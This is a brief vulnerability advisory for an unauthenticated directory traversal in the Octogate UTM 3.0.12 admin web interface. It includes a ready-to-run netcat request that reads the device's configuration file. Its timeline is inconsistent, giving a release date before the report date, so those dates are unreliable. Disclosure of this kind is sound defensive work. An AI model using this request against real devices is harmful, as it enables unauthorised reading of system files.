Octogate UTM Admin Interface Directory Traversal
================================================

Affected Products/Versions
--------------------------

Product Name: Octogate
Version: 3.0.12


Product/Company Information
---------------------------

Octogate is a UTM Device, including the following features: Application Firewall, Intrusion Detection and -Prevention, Stateful- & Deep Packet Inspection, DoS- and DDoS protection and Reverse Proxy.

Octogate IT Security Systems GmbH is based in Germany.


Vulnerability Description
-------------------------

Octogate UTM Device is managed via web interface. The download function for SSL-Certifcate and Documentation is accessible without authentication, and allows access to files outside of the web root.
 
Example request:

echo -en "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer: http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80


Patch Information
-----------------

Patch is available from vendor.


Advisory Information
--------------------

http://www.oliverkarow.de/research/octogate.txt


Timeline
--------

24.10.2014 - Reported to vendor
xx.xx.2014 - Fixed by vendor.
26.08.2014 - Advisory release ( lazy me )